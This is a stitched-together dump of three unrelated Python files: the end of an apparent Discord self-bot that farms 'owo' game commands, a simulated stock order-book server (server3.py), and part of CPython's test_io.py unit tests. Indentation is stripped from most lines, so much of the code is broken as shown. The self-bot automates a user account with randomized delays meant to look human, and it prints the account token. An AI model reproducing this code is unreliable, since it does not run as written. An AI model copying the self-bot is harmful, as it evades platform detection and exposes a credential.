time.sleep(5)
client.sendMessage(str(bot.channel), "owo inv")
print(f"{at()}{bot.color.okgreen} [SENT] {bot.color.reset} owo inv")
time.sleep(7)
msgs=client.getMessages(str(bot.channel), num=5)
msgs=json.loads(msgs.text)
inv = 0
for msgone in msgs:
if msgone['author']['id']==str(bot.owoid) and 'Inventory' in msgone['content']:
inv=re.findall(r'`(.*?)`', msgone['content'])
if not inv:
security()
else:
if '50' in inv:
client.sendMessage(str(bot.channel), "owo lb all")
print(f"{at()}{bot.color.okgreen} [SENT] {bot.color.reset} owo lb all")
time.sleep(13)
gems()
return
for item in inv:
try:
if int(item) > 100:
inv.pop(inv.index(item)) #weapons
except: #backgounds etc
inv.pop(inv.index(item))
tier = [[],[],[]]
print(f"{at()}{bot.color.okblue} [INFO] {bot.color.reset} Found {len(inv)} gems Inventory")
for gem in inv:
gem =int(gem)
if 50 < gem < 60:
tier[0].append(gem)
elif 60 < gem < 70:
tier[1].append(gem)
elif 70 < gem < 80:
tier[2].append(gem)
for level in range(0,3):
if not len(tier[level]) == 0:
client.sendMessage(str(bot.channel), "owo use "+str(max(tier[level])))
print(f"{at()}{bot.color.okgreen} [SENT] {bot.color.reset} owo use {str(max(tier[level]))}")
time.sleep(7)
def loopie():
x=True
pray = 0
gem=pray
main=time.time()
while x:
runner()
if time.time() - pray > random.randint(300, 600):
security()
owopray()
pray=time.time()
if time.time() - gem > random.randint(600, 1000):
security()
gems()
gem=time.time()
if time.time() - main > random.randint(1000, 2000):
time.sleep(random.randint(300, 600))
            security()
main=time.time()
@client.gateway.command
def defination1(resp):
global once
if not once:
once=True
if __name__ == '__main__':
lol=multiprocessing.Process(target=loopie)
lol.run()
print(bot.token)
client.gateway.run()
|
server3.py
|
################################################################################
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#from itertools import izip
from random import normalvariate, random
from datetime import timedelta, datetime
import csv
import dateutil.parser
import os.path
import operator
import json
import re
import threading
#from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
import http.server
from socketserver import ThreadingMixIn
################################################################################
#
# Config
# Sim params
REALTIME = True
SIM_LENGTH = timedelta(days = 365 * 5)
MARKET_OPEN = datetime.today().replace(hour = 0, minute = 30, second = 0)
# Market params
# min / max / std
SPD = (2.0, 6.0, 0.1)
PX = (60.0, 150.0, 1)
FREQ = (12, 36, 50)
# Trades
OVERLAP = 4
################################################################################
#
# Test Data
def bwalk(min, max, std):
""" Generates a bounded random walk. """
rng = max - min
while True:
max += normalvariate(0, std)
yield abs((max % (rng * 2)) - rng) + min
def market(t0 = MARKET_OPEN):
""" Generates a random series of market conditions,
(time, price, spread).
"""
for hours, px, spd in zip(bwalk(*FREQ), bwalk(*PX), bwalk(*SPD)):
yield t0, px, spd
t0 += timedelta(hours = abs(hours))
def orders(hist):
""" Generates a random set of limit orders (time, side, price, size) from
a series of market conditions.
"""
for t, px, spd in hist:
stock = 'ABC' if random() > 0.5 else 'DEF'
side, d = ('sell', 2) if random() > 0.5 else ('buy', -2)
order = round(normalvariate(px + (spd / d), spd / OVERLAP), 2)
size = int(abs(normalvariate(0, 100)))
yield t, stock, side, order, size
################################################################################
#
# Order Book
def add_book(book, order, size, _age = 10):
""" Add a new order and size to a book, and age the rest of the book. """
yield order, size, _age
for o, s, age in book:
if age > 0:
yield o, s, age - 1
def clear_order(order, size, book, op = operator.ge, _notional = 0):
""" Try to clear a sized order against a book, returning a tuple of
(notional, new_book) if successful, and None if not. _notional is a
recursive accumulator and should not be provided by the caller.
"""
(top_order, top_size, age), tail = book[0], book[1:]
if op(order, top_order):
_notional += min(size, top_size) * top_order
sdiff = top_size - size
if sdiff > 0:
return _notional, list(add_book(tail, top_order, sdiff, age))
elif len(tail) > 0:
return clear_order(order, -sdiff, tail, op, _notional)
def clear_book(buy = None, sell = None):
""" Clears all crossed orders from a buy and sell book, returning the new
books uncrossed.
"""
while buy and sell:
order, size, _ = buy[0]
new_book = clear_order(order, size, sell)
if new_book:
sell = new_book[1]
buy = buy[1:]
else:
break
return buy, sell
def order_book(orders, book, stock_name):
""" Generates a series of order books from a series of orders. Order books
are mutable lists, and mutating them during generation will affect the
next turn!
"""
for t, stock, side, order, size in orders:
if stock_name == stock:
new = add_book(book.get(side, []), order, size)
book[side] = sorted(new, reverse = side == 'buy', key = lambda x: x[0])
bids, asks = clear_book(**book)
yield t, bids, asks
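def _demo_order_book():
    """ Illustrative sketch (not part of the original module): build a tiny book by
    hand with add_book() and let clear_book() match the crossed orders. Prices and
    sizes are made up purely for demonstration.
    """
    book = {}
    # A resting sell at 101.0 for 50 and a buy at 102.0 for 30: the orders cross.
    book['sell'] = sorted(add_book(book.get('sell', []), 101.0, 50), key = lambda x: x[0])
    book['buy'] = sorted(add_book(book.get('buy', []), 102.0, 30),
                         reverse = True, key = lambda x: x[0])
    bids, asks = clear_book(**book)
    # The buy is fully filled: no bids remain and the sell is reduced to 20 units.
    return bids, asks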
################################################################################
#
# Test Data Persistence
def generate_csv():
""" Generate a CSV of order history. """
    with open('test.csv', 'w', newline='') as f:
writer = csv.writer(f)
for t, stock, side, order, size in orders(market()):
if t > MARKET_OPEN + SIM_LENGTH:
break
writer.writerow([t, stock, side, order, size])
def read_csv():
""" Read a CSV or order history into a list. """
with open('test.csv', 'rt') as f:
for time, stock, side, order, size in csv.reader(f):
yield dateutil.parser.parse(time), stock, side, float(order), int(size)
################################################################################
#
# Server
class ThreadedHTTPServer(ThreadingMixIn, http.server.HTTPServer):
""" Boilerplate class for a multithreaded HTTP Server, with working
shutdown.
"""
allow_reuse_address = True
def shutdown(self):
""" Override MRO to shutdown properly. """
self.socket.close()
http.server.HTTPServer.shutdown(self)
def route(path):
""" Decorator for a simple bottle-like web framework. Routes path to the
decorated method, with the rest of the path as an argument.
"""
def _route(f):
setattr(f, '__route__', path)
return f
return _route
def read_params(path):
""" Read query parameters into a dictionary if they are parseable,
otherwise returns None.
"""
query = path.split('?')
if len(query) > 1:
query = query[1].split('&')
return dict(map(lambda x: x.split('='), query))
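def _demo_read_params():
    """ Illustrative sketch (not part of the original module): read_params() turns a
    query string into a dict, and falls through to an implicit None when the path
    has no query component. The paths below are made up for the demo.
    """
    assert read_params('/query?id=1&stock=ABC') == {'id': '1', 'stock': 'ABC'}
    assert read_params('/query') is None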
def get(req_handler, routes):
""" Map a request to the appropriate route of a routes instance. """
for name, handler in routes.__class__.__dict__.items():
if hasattr(handler, "__route__"):
            if re.search(handler.__route__, req_handler.path) is not None:
req_handler.send_response(200)
req_handler.send_header('Content-Type', 'application/json')
req_handler.send_header('Access-Control-Allow-Origin', '*')
req_handler.end_headers()
params = read_params(req_handler.path)
data = json.dumps(handler(routes, params)) + '\n'
req_handler.wfile.write(bytes(data, encoding = 'utf-8'))
return
def run(routes, host = '0.0.0.0', port = 8080):
""" Runs a class as a server whose methods have been decorated with
@route.
"""
class RequestHandler(http.server.BaseHTTPRequestHandler):
def log_message(self, *args, **kwargs):
pass
def do_GET(self):
get(self, routes)
server = ThreadedHTTPServer((host, port), RequestHandler)
thread = threading.Thread(target = server.serve_forever)
thread.daemon = True
thread.start()
    print ('HTTP server started on port %d' % port)
while True:
from time import sleep
sleep(1)
    server.shutdown()  # note: unreachable while the loop above runs forever
################################################################################
#
# App
ops = {
'buy': operator.le,
'sell': operator.ge,
}
class App(object):
""" The trading game server application. """
def __init__(self):
self._book_1 = dict()
self._book_2 = dict()
self._data_1 = order_book(read_csv(), self._book_1, 'ABC')
self._data_2 = order_book(read_csv(), self._book_2, 'DEF')
self._rt_start = datetime.now()
self._sim_start, _, _ = next(self._data_1)
self.read_10_first_lines()
@property
def _current_book_1(self):
for t, bids, asks in self._data_1:
if REALTIME:
while t > self._sim_start + (datetime.now() - self._rt_start):
yield t, bids, asks
else:
yield t, bids, asks
@property
def _current_book_2(self):
for t, bids, asks in self._data_2:
if REALTIME:
while t > self._sim_start + (datetime.now() - self._rt_start):
yield t, bids, asks
else:
yield t, bids, asks
def read_10_first_lines(self):
for _ in iter(range(10)):
next(self._data_1)
next(self._data_2)
@route('/query')
def handle_query(self, x):
""" Takes no arguments, and yields the current top of the book; the
best bid and ask and their sizes
"""
try:
t1, bids1, asks1 = next(self._current_book_1)
t2, bids2, asks2 = next(self._current_book_2)
        except Exception:
            print ("error getting stocks... reinitializing app")
self.__init__()
t1, bids1, asks1 = next(self._current_book_1)
t2, bids2, asks2 = next(self._current_book_2)
t = t1 if t1 > t2 else t2
print ('Query received @ t%s' % t)
return [{
'id': x and x.get('id', None),
'stock': 'ABC',
'timestamp': str(t),
'top_bid': bids1 and {
'price': bids1[0][0],
'size': bids1[0][1]
},
'top_ask': asks1 and {
'price': asks1[0][0],
'size': asks1[0][1]
}
},
{
'id': x and x.get('id', None),
'stock': 'DEF',
'timestamp': str(t),
'top_bid': bids2 and {
'price': bids2[0][0],
'size': bids2[0][1]
},
'top_ask': asks2 and {
'price': asks2[0][0],
'size': asks2[0][1]
}
}]
################################################################################
#
# Main
if __name__ == '__main__':
if not os.path.isfile('test.csv'):
print ("No data found, generating...")
generate_csv()
run(App())
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import time
import array
import random
import unittest
import weakref
import abc
import signal
import errno
from itertools import cycle, count
from collections import deque
from test import test_support as support
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import fcntl
except ImportError:
fcntl = None
__metaclass__ = type
bytes = support.py3k_bytes
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with io.open(__file__, "r", encoding="latin1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return MockRawIO.write(self, b) * 2
def read(self, n=None):
return MockRawIO.read(self, n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
MockRawIO.readinto(self, buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise IOError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super(MockFileIO, self).__init__(data)
def read(self, n=None):
res = super(MockFileIO, self).read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super(MockFileIO, self).readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = bytearray(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data, b" worl")
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(bytearray(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(bytearray()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(IOError, fp.read)
self.assertRaises(IOError, fp.readline)
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(IOError, fp.write, b"blah")
self.assertRaises(IOError, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(IOError, fp.write, "blah")
self.assertRaises(IOError, fp.writelines, ["blah\n"])
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
        # On Windows and Mac OS X this test consumes large resources; it takes
# a long time to build the >2GB file and takes >2GB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
if not support.is_resource_enabled("largefile"):
print("\nTesting large file ops skipped on %s." % sys.platform,
file=sys.stderr)
print("It requires %d bytes and a long time." % self.LARGE,
file=sys.stderr)
print("Use 'regrtest.py -u largefile test_io' to run it.",
file=sys.stderr)
return
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1 // 0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1 // 0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertTrue(f.tell() > 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super(MyFileIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyFileIO, self).close()
def flush(self):
record.append(3)
super(MyFileIO, self).flush()
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super(MyIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super(MyIO, self).close()
def flush(self):
record.append(self.on_flush)
super(MyIO, self).flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array(b'i', range(10))
n = len(a.tostring())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def test_flush_error_on_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
def bad_flush():
raise IOError()
f.flush = bad_flush
self.assertRaises(IOError, f.close) # exception not swallowed
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertTrue(wr() is None, wr)
class PyIOTest(IOTest):
test_array_writes = unittest.skip(
"len(array.array) returns number of elements rather than bytelength"
)(IOTest.test_array_writes)
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_no_fileno(self):
# XXX will we always have a fileno() function? If so, kill
# this test. Else, write it.
pass
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 3)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super(MyBufferedIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyBufferedIO, self).close()
def flush(self):
record.append(3)
super(MyBufferedIO, self).flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__name__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name=u'dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
def test_flush_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise IOError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(IOError, b.close) # exception not swallowed
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises((AttributeError, TypeError)):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
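# Measure sys.getsizeof() with two different buffer sizes: the difference
# between the two results should equal the difference between the buffer
# sizes, which keeps the check independent of the fixed per-object overhead.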
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
